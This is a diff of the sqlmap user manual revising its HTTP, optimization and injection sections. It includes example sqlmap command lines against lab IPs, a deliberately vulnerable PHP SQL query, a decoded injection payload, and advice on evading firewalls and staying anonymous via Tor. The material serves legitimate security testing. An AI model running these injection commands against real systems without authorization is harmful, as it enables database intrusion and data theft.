+will randomly select a <CODE>User-Agent</CODE> from the <CODE>./txt/user-agents.txt</CODE>
+textual file and use it for all HTTP requests within the session.</P>
 
 <P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
 header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
-not provided, its value is not expected or its value is blocked by a web
+not provided, its value is not expected or is blacklisted by a web
 application firewall or similar intrusion prevention system. In this case
 sqlmap will show you a message as follows:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
-to force the HTTP User-Agent header with option --user-agent or -a
+[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to 
+force the HTTP User-Agent header with option --user-agent or --random-agent
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
+<P>Note that also the HTTP <CODE>User-Agent</CODE> header is tested against SQL
+injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>3</B> or above.
+Read below for details.</P>
+
 
 <H3>HTTP <CODE>Referer</CODE> header</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-referer</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-referer</CODE></P>
 
-<P>It is possible to fake the HTTP <CODE>Referer</CODE> header value with this
-option. By default no HTTP <CODE>Referer</CODE> header is sent in HTTP
-requests.</P>
+<P>It is possible to fake the HTTP <CODE>Referer</CODE> header value. By default
+<B>no</B> HTTP <CODE>Referer</CODE> header is sent in HTTP requests if not
+explicitly set.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --referer \
-  "http://www.google.com" -v 3
-
-[...]
-[hh:mm:48] [INFO] testing connection to the target url
-[hh:mm:48] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Referer: http://www.google.com
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>Note that also the HTTP <CODE>Referer</CODE> header is tested against SQL
+injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>3</B> or above.
+Read below for details.</P>
 
 
 <H3>Extra HTTP headers</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-headers</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-headers</CODE></P>
 
-<P>It is possible to provide extra HTTP headers by providing <CODE>-</CODE><CODE>-headers</CODE>
-options. Each header must be separated by a newline and it's much easier
-to provide them from the configuration INI file. Have a look at the sample
-<CODE>sqlmap.conf</CODE> file.</P>
+<P>It is possible to provide extra HTTP headers by setting the
+<CODE>-</CODE><CODE>-headers</CODE> switch. Each header must be separated by a
+newline and it is much easier to provide them from the configuration INI
+file. Have a look at the sample <CODE>sqlmap.conf</CODE> file for an example.</P>
 
 
-<H3>HTTP <CODE>Basic</CODE>, <CODE>Digest</CODE> and <CODE>NTLM</CODE> authentications</H3>
+<H3>HTTP protocol authentication</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-auth-type</CODE> and <CODE>-</CODE><CODE>-auth-cred</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-auth-type</CODE> and <CODE>-</CODE><CODE>-auth-cred</CODE></P>
 
-<P>These options can be used to specify which HTTP authentication type the
-web server implements and the valid credentials to be used to perfom all
-HTTP requests to the target application.
-The three valid types are <CODE>Basic</CODE>, <CODE>Digest</CODE> and <CODE>NTLM</CODE>,
-while the credentials' syntax is <CODE>username:password</CODE>.</P>
+<P>These options can be used to specify which HTTP protocol authentication
+the web server implements and the valid credentials to be used to perform
+all HTTP requests to the target application.</P>
+<P>The three supported HTTP protocol authentication mechanisms are:</P>
+<P>
+<UL>
+<LI><CODE>Basic</CODE></LI>
+<LI><CODE>Digest</CODE></LI>
+<LI><CODE>NTLM</CODE></LI>
+</UL>
+</P>
+<P>While the credentials' syntax is <CODE>username:password</CODE>.</P>
 
-<P>Examples on a <B>MySQL 5.0.67</B> target:</P>
+<P>Example of valid syntax:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/basic/get_int.php?id=1" \
-  --auth-type Basic --auth-cred "testuser:testpass" -v 3
-
-[...]
-[hh:mm:14] [INFO] testing connection to the target url
-[hh:mm:14] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/basic/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
-
-
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/digest/get_int.php?id=1" \
-  --auth-type Digest --auth-cred "testuser:testpass" -v 3
-
-[...]
-[hh:mm:54] [INFO] testing connection to the target url
-[hh:mm:54] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/digest/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-Authorization: Digest username="testuser", realm="Testing digest authentication", 
-nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", 
-uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", 
-algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a"
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
+  --auth-type Basic --auth-cred "testuser:testpass"
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
 
-<H3>HTTP Certificate authentication</H3>
+<H3>HTTP protocol certificate authentication</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-auth-cert</CODE></P>
-<P>This option should be used in cases when the web server requires proper user's 
-certificate for authentication. Supplied values should be in the form: <CODE>key_file,
-cert_file</CODE>, where <CODE>key_file</CODE> should be the name of a PEM formatted file that 
-contains your private key, while <CODE>cert_file</CODE> should be the name for a PEM formatted 
-certificate chain file.</P>
+<P>Switch: <CODE>-</CODE><CODE>-auth-cert</CODE></P>
 
-<P>Example:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://www.example.com/process.php?id=1" \
-  --auth-cert key.pem,cert.pem
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>This switch should be used in cases when the web server requires proper
+client-side certificate for authentication. Supplied values should be in
+the form: <CODE>key_file,cert_file</CODE>, where <CODE>key_file</CODE> should be
+the name of a PEM formatted file that contains your private key, while
+<CODE>cert_file</CODE> should be the name for a PEM formatted certificate
+chain file.</P>
 
 
-<H3>HTTP proxy</H3>
+<H3>HTTP(S) proxy</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-proxy</CODE> and <CODE>-</CODE><CODE>-ignore-proxy</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-proxy</CODE>, <CODE>-</CODE><CODE>-proxy-cred</CODE> and <CODE>-</CODE><CODE>-ignore-proxy</CODE></P>
 
-<P>It is possible to provide an anonymous HTTP proxy address to pass by the
-HTTP requests to the target URL. The syntax of HTTP proxy value is
+<P>It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S)
+requests to the target URL. The syntax of HTTP(S) proxy value is
 <CODE>http://url:port</CODE>.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
-  --proxy "http://172.16.213.1:8080"
+<P>If the HTTP(S) proxy requires authentication, you can provide the
+credentials in the format <CODE>username:password</CODE> to the
+<CODE>-</CODE><CODE>-proxy-cred</CODE> switch.</P>
 
-[hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
-[hh:mm:37] [WARNING] the back-end DMBS is not MySQL
-[hh:mm:37] [WARNING] the back-end DMBS is not Oracle
-back-end DBMS:    PostgreSQL
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>If, for any reason, you need to stay anonymous, instead of passing by a
+single predefined HTTP(S) proxy server, you can configure a 
+<A HREF="http://www.torproject.org/">Tor client</A> together with
+<A HREF="http://www.privoxy.org">Privoxy</A> (or similar) on
+your machine as explained on the Tor client guide and use the Privoxy
+daemon, by default listening on <CODE>127.0.0.1:8118</CODE>, as the sqlmap
+proxy.</P>
 
-<P>Instead of using a single anonymous HTTP proxy server to pass by, you can
-configure a 
-<A HREF="http://tor.eff.org">Tor client</A> together
-with 
-<A HREF="http://www.privoxy.org">Privoxy</A> on your machine
-as explained on the 
-<A HREF="http://tor.eff.org/docs/tor-doc-unix.html.en">Tor client guide</A> then run sqlmap as follows:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
-  --proxy "http://172.16.213.1:8118"
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Note that <CODE>8118</CODE> is the default Privoxy port, adapt it to your
-settings.</P>
-
-<P>The option <CODE>-</CODE><CODE>-ignore-proxy</CODE> should be used in cases like
-when you want to run sqlmap against the machine inside a local area
-network skipping default usage of a system-wide set HTTP proxy server.</P>
+<P>The switch <CODE>-</CODE><CODE>-ignore-proxy</CODE> should be used when you want
+to run sqlmap against a target part of a local area network by ignoring
+the system-wide set HTTP(S) proxy server setting.</P>
 
 
-<H3>Concurrent HTTP requests</H3>
+<H3>Delay between each HTTP request</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-threads</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-delay</CODE></P>
 
-<P>It is possible to specify the number of maximum concurrent HTTP requests
-that sqlmap can start when it uses the blind SQL injection technique to
-retrieve the query output.
-This feature relies on the 
-<A HREF="http://en.wikipedia.org/wiki/Multithreading">multithreading</A> concept and inherits both its pro and its cons.</P>
-
-<P>Examples on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
-  --current-user --threads 3
-
-[...]
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:18] [INFO] fetching current user
-[hh:mm:18] [INFO] retrieving the length of query output
-[hh:mm:18] [INFO] retrieved: 18
-[hh:mm:19] [INFO] starting 3 threads
-[hh:mm:19] [INFO] retrieved: testuser@localhost
-current user:    'testuser@localhost'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, sqlmap first calculates the length of the query output,
-then starts three threads. Each thread is assigned to retrieve one
-character of the query output. The thread then ends after up to seven
-HTTP requests, the maximum requests to retrieve a query output character
-with the blind SQL injection bisection algorithm implemented in sqlmap.</P>
-
-<P>Note that the multithreading option is not needed if the target is affected
-by an inband SQL injection vulnerability and the <CODE>-</CODE><CODE>-union-use</CODE>
-option has been provided.</P>
-
-
-<H3>Delay in seconds between each HTTP request</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-delay</CODE></P>
-
-<P>It is possible to specify a number of seconds to wait between each HTTP
-request. The valid value is a float, for instance 0.5 means half a second.</P>
+<P>It is possible to specify a number of seconds to hold between each HTTP(S)
+request. The valid value is a float, for instance <CODE>0.5</CODE> means half
+a second.
+By default, no delay is set.</P>
 
 
 <H3>Seconds to wait before timeout connection</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-timeout</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-timeout</CODE></P>
 
 <P>It is possible to specify a number of seconds to wait before considering
-the HTTP request timed out. The valid value is a float, for instance
-10.5 means ten seconds and a half.</P>
+the HTTP(S) request timed out. The valid value is a float, for instance
+10.5 means ten seconds and a half.
+By default <B>30 seconds</B> are set.</P>
 
 
 <H3>Maximum number of retries when the HTTP connection timeouts</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-retries</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-retries</CODE></P>
 
-<P>It is possible to specify the maximum number of retries when the HTTP
-connection timeouts. By default it retries up to three times.</P>
+<P>It is possible to specify the maximum number of retries when the HTTP(S)
+connection timeouts. By default it retries up to <B>three times</B>.</P>
 
 
 <H3>Filtering targets from provided proxy log using regular expression</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-scope</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-scope</CODE></P>
 
-<P>Rather than using all hosts parsed from provided logs with option 
-<CODE>-l</CODE>, in combination with this option you can specify valid 
-python regular expression to be used for filtering desired ones.</P>
+<P>Rather than using all hosts parsed from provided logs with switch 
+<CODE>-l</CODE>, you can specify valid Python regular expression to be used
+for filtering desired ones.</P>
 <P>Example usage:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -l /tmp/webscarab.log/conversations/ --scope="(www)?\.target\.(com|net|org)"
+$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
 
-<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Injection</A>
+<H3>Avoid your session to be destroyed after too many unsuccessful requests</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-safe-url</CODE> and <CODE>-</CODE><CODE>-safe-freq</CODE></P>
+
+<P>Sometimes web applications or inspection technology in between destroys
+the session if a certain number of unsuccessful requests is performed.
+This might occur during the detection phase of sqlmap or when it exploits
+any of the blind SQL injection types. Reason why is that the SQL payload
+does not necessarily returns output and might therefore raise a signal to
+either the application session management or the inspection technology.</P>
+
+<P>To bypass this limitation set by the target, you can provide two switches:</P>
+<P>
+<UL>
+<LI><CODE>-</CODE><CODE>-safe-url</CODE>: Url address to visit frequently during
+testing.</LI>
+<LI><CODE>-</CODE><CODE>-safe-freq</CODE>: Test requests between two visits to a
+given safe url.</LI>
+</UL>
+</P>
+
+<P>This way, sqlmap will visit every a predefined number of requests a
+certain <EM>safe</EM> URL without performing any kind of injection against
+it.</P>
+
+
+<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Optimization</A>
+</H2>
+
+<P>These switches can be used to optimize the performance of sqlmap.</P>
+
+
+<H3>Bundle optimization</H3>
+
+<P>Switch: <CODE>-o</CODE></P>
+
+<P>This switch is an alias that implicitly sets the following:</P>
+<P>
+<UL>
+<LI><CODE>-</CODE><CODE>-keep-alive</CODE></LI>
+<LI><CODE>-</CODE><CODE>-null-connection</CODE></LI>
+<LI><CODE>-</CODE><CODE>-threads 4</CODE></LI>
+<LI><CODE>-</CODE><CODE>-group-concat</CODE></LI>
+</UL>
+</P>
+
+<P>Read below for details about every single switch.</P>
+
+
+<H3>Output prediction</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-predict-output</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>HTTP Keep-Alive</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-keep-alive</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>HTTP NULL connection</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-null-connection</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Concurrent HTTP(S) requests</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-threads</CODE></P>
+
+<P>It is possible to specify the maximum number of concurrent HTTP(S)
+requests that sqlmap is allowed to do.
+This feature relies on the 
+<A HREF="http://en.wikipedia.org/wiki/Multithreading">multi-threading</A> concept and inherits both its pro and its cons.</P>
+
+<P>This features applies to the brute-force switches and when the data
+fetching is done through any of the blind SQL injection techniques.
+For the latter case, sqlmap first calculates the length of the query
+output in a single thread, then starts the multi-threading. Each thread is
+assigned to retrieve one character of the query output. The thread ends
+when that character is retrieved - it takes up to 7 HTTP(S) requests with
+the bisection algorithm implemented in sqlmap.</P>
+
+<P>Note that the multi-threading switch does not affect any other SQL
+injection technique. The maximum number of concurrent requests is set to
+<B>10</B> for performance and site reliability reasons.</P>
+
+
+<H3>MySQL GROUP_CONCAT() speed up</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-group-concat</CODE></P>
+
+<P>TODO</P>
+
+
+<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Injection</A>
 </H2>
 
 <P>These options can be used to specify which parameters to test for, provide
-custom injection payloads and how to parse and compare HTTP responses page
-content when using the blind SQL injection technique.</P>
+custom injection payloads and optional tampering scripts.</P>
 
 
 <H3>Testable parameter(s)</H3>
 
-<P>Option: <CODE>-p</CODE></P>
+<P>Switch: <CODE>-p</CODE></P>
 
-<P>By default sqlmap tests all <CODE>GET</CODE> parameters, <CODE>POST</CODE>
-parameters, HTTP <CODE>Cookie</CODE> header values and HTTP <CODE>User-Agent</CODE>
-header value for dynamicity and SQL injection vulnerability, but it is
-possible to manually specificy the parameter(s) you want sqlmap to perform
-tests on comma separeted in order to skip dynamicity tests and perform SQL
-injection test and inject directly only against the provided parameter(s).</P>
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 \
-  -p "id"
+<P>By default sqlmap tests all <CODE>GET</CODE> parameters and <CODE>POST</CODE>
+parameters. When the value of <CODE>-</CODE><CODE>-level</CODE> is >= <B>2</B>
+it tests also HTTP <CODE>Cookie</CODE> header values. When this value is >=
+<B>3</B> it tests also HTTP <CODE>User-Agent</CODE> and HTTP <CODE>Referer</CODE>
+header value for SQL injections.
+It is however possible to manually specify a comma-separated list of
+parameter(s) that you want sqlmap to test. This will bypass the dependence
+on the value of <CODE>-</CODE><CODE>-level</CODE> too.</P>
 
-[hh:mm:48] [INFO] testing connection to the target url
-[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:49] [INFO] url is stable
-[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Or, if you want to provide more than one parameter, for instance:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-  -p "cat,id"
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also test only the HTTP <CODE>User-Agent</CODE> header.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/ua_str.php" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
-
-[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
-[hh:mm:40] [INFO] testing connection to the target url
-[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:41] [INFO] url is stable
-[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
-[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
-[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:41] [INFO] testing MySQL
-[hh:mm:41] [INFO] retrieved: 44
-[hh:mm:41] [INFO] confirming MySQL
-[hh:mm:41] [INFO] retrieved: 1
-[hh:mm:41] [INFO] retrieved: 4
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>For instance, to test for GET parameter <CODE>id</CODE> and for HTTP
+<CODE>User-Agent</CODE> only, provide <CODE>-p id,user-agent</CODE>.</P>
 
 
 <H3>Force the database management system name</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-dbms</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-dbms</CODE></P>
 
 <P>By default sqlmap automatically detects the web application's back-end
 database management system.
-At the moment, fully supported database management systems are:</P>
+As of version <B>0.9</B>, sqlmap fully supports the following database
+management systems:</P>
 <P>
 <UL>
 <LI>MySQL</LI>
 <LI>Oracle</LI>
 <LI>PostgreSQL</LI>
 <LI>Microsoft SQL Server</LI>
+<LI>Microsoft Access</LI>
+<LI>SQLite</LI>
+<LI>Firebird</LI>
+<LI>Sybase</LI>
+<LI>SAP MaxDB</LI>
 </UL>
 </P>
 
-<P>It is possible to force the DBMS name if you already know it so that sqlmap
-will skip the fingerprint with an exception for MySQL and Microsoft SQL
-Server to only identify the version.
-To avoid also this check you can provide instead <CODE>MySQL &lt;version&gt;</CODE> or
-<CODE>Microsoft SQL Server &lt;version&gt;</CODE>, where &lt;version&gt; is a valid version for
-the DBMS; for instance <CODE>5.0</CODE> for MySQL and <CODE>2005</CODE> for
-Microsoft SQL Server.</P>
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 2 \
-  --dbms "PostgreSQL"
+<P>If for any reason sqlmap fails to detect the back-end DBMS once a SQL
+injection has been identified or if you want to avoid an active fingeprint,
+you can provide the name of the back-end DBMS yourself (e.g. <CODE>postgresql</CODE>).
+For MySQL and Microsoft SQL Server provide them respectively in the form
+<CODE>MySQL &lt;version&gt;</CODE> and <CODE>Microsoft SQL Server &lt;version&gt;</CODE>, where <CODE>&lt;version&gt;</CODE> is a valid version for the DBMS; for
+instance <CODE>5.0</CODE> for MySQL and <CODE>2005</CODE> for Microsoft SQL Server.</P>
 
-[...]
-[hh:mm:31] [DEBUG] skipping to test for MySQL
-[hh:mm:31] [DEBUG] skipping to test for Oracle
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS:    PostgreSQL
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>In case you provide <CODE>-</CODE><CODE>-fingerprint</CODE> together with <CODE>-</CODE><CODE>-dbms</CODE>,
-sqlmap will only perform the extensive fingerprint for the specified
-database management system, read below for further details.</P>
+<P>In case you provide <CODE>-</CODE><CODE>-fingerprint</CODE> together with
+<CODE>-</CODE><CODE>-dbms</CODE>, sqlmap will only perform the extensive
+fingerprint for the specified database management system only, read below
+for further details.</P>
 
 <P>Note that this option is <B>not</B> mandatory and it is strongly
 recommended to use it <B>only if you are absolutely sure</B> about the
 back-end database management system. If you do not know it, let sqlmap
-automatically identify it for you.</P>
+automatically fingerprint it for you.</P>
 
 
 <H3>Force the database management system operating system name</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-os</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-os</CODE></P>
 
 <P>By default sqlmap automatically detects the web application's back-end
-database management system underlying operating system when requested by
-any other functionality.
+database management system underlying operating system when this
+information is a dependence of any other provided switch.
 At the moment the fully supported operating systems are two:</P>
 <P>
 <UL>
@@ -2028,8 +1583,8 @@ At the moment the fully supported operating systems are two:</P>
 </UL>
 </P>
 
-<P>It is possible to force the operating system name if you already know it so
-that sqlmap will skip the fingerprint.</P>
+<P>It is possible to force the operating system name if you already know it
+so that sqlmap will avoid doing it itself.</P>
 
 <P>Note that this option is <B>not</B> mandatory and it is strongly
 recommended to use it <B>only if you are absolutely sure</B> about the
@@ -2039,76 +1594,85 @@ not know it, let sqlmap automatically identify it for you.</P>
 
 <H3>Custom injection payload</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-prefix</CODE> and <CODE>-</CODE><CODE>-postfix</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-prefix</CODE> and <CODE>-</CODE><CODE>-suffix</CODE></P>
 
 <P>In some circumstances the vulnerable parameter is exploitable only if the
-user provides a postfix to be appended to the injection payload.
+user provides a specific suffix to be appended to the injection payload.
 Another scenario where these options come handy presents itself when the
 user already knows that query syntax and want to detect and exploit the
-SQL injection by directly providing a injection payload prefix and/or
-postfix.</P>
+SQL injection by directly providing a injection payload prefix and suffix.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target on a page where the SQL query is:
-<CODE>$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";</CODE>:</P>
+<P>Example of vulnerable source code:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
-  -p "id" --prefix "'" --postfix "AND 'test'='test"
+$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
-[...]
-[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
-[hh:mm:16] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
-%28%27test%27=%27test HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
-[hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
+<P>To detect and exploit this SQL injection, you can either let sqlmap detect
+the <B>boundaries</B> (as in combination of SQL payload prefix and
+suffix) for you during the detection phase, or provide them on your own.
+For example:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
+  -p id --prefix "')" --suffix "AND ('abc'='abc"
 [...]
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>As you can see, the injection payload for testing for custom injection is:</P>
+<P>This will result in all sqlmap requests to end up in a query as follows:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-<P>which URL decoded is:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-id=1') AND 7433=7433 AND ('test'='test
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-<P>and makes the query syntatically correct to the page query:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
+$query = "SELECT * FROM users WHERE id=('1') &lt;PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
+<P>Which makes the query syntactically correct.</P>
+
 <P>In this simple example, sqlmap could detect the SQL injection and exploit
-it without need to provide a custom injection payload, but sometimes in
-the real world application it is necessary to provide it.</P>
+it without need to provide custom boundaries, but sometimes in real world
+application it is necessary to provide it when the injection point is
+within nested <CODE>JOIN</CODE> queries for instance.</P>
 
 
-<H3>Page comparison</H3>
+<H3>Tamper injection data</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-string</CODE> and <CODE>-</CODE><CODE>-regexp</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-tamper</CODE></P>
+
+<P>TODO</P>
+
+
